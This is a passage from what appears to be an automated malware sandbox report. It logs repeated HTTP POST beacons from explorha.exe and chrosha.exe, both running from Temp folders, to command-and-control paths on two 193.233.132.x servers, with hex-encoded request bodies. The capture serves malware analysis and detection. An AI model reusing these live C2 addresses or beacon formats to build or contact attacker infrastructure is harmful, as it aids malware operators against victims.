                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:11.979868889 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      267192.168.2.550109193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:11.801348925 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:12.045923948 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      268192.168.2.550110193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:12.298801899 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:12.551703930 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      269192.168.2.550111193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:12.339152098 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:12.586751938 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      270192.168.2.550112193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:12.836157084 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:13.086575985 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      271192.168.2.550113193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:12.902077913 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:13.146429062 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      272192.168.2.550114193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:13.399607897 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:13.652250051 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      273192.168.2.550115193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:13.440234900 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:13.683067083 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      274192.168.2.550116193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:13.932378054 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:14.183891058 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      275192.168.2.550117193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:14.005702972 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:14.244618893 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      276192.168.2.550118193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:14.497414112 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:14.748091936 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      277192.168.2.550119193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:14.539510012 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:14.787008047 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      278192.168.2.550120193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:15.043200016 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:15.296638012 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      279192.168.2.550121193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:15.107502937 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:15.355252981 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      280192.168.2.550122193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:15.604732037 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:15.852655888 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      281192.168.2.550123193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:15.651411057 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:15.900526047 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:15.908818007 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:16.163661003 CEST196INHTTP/1.1 200 OK
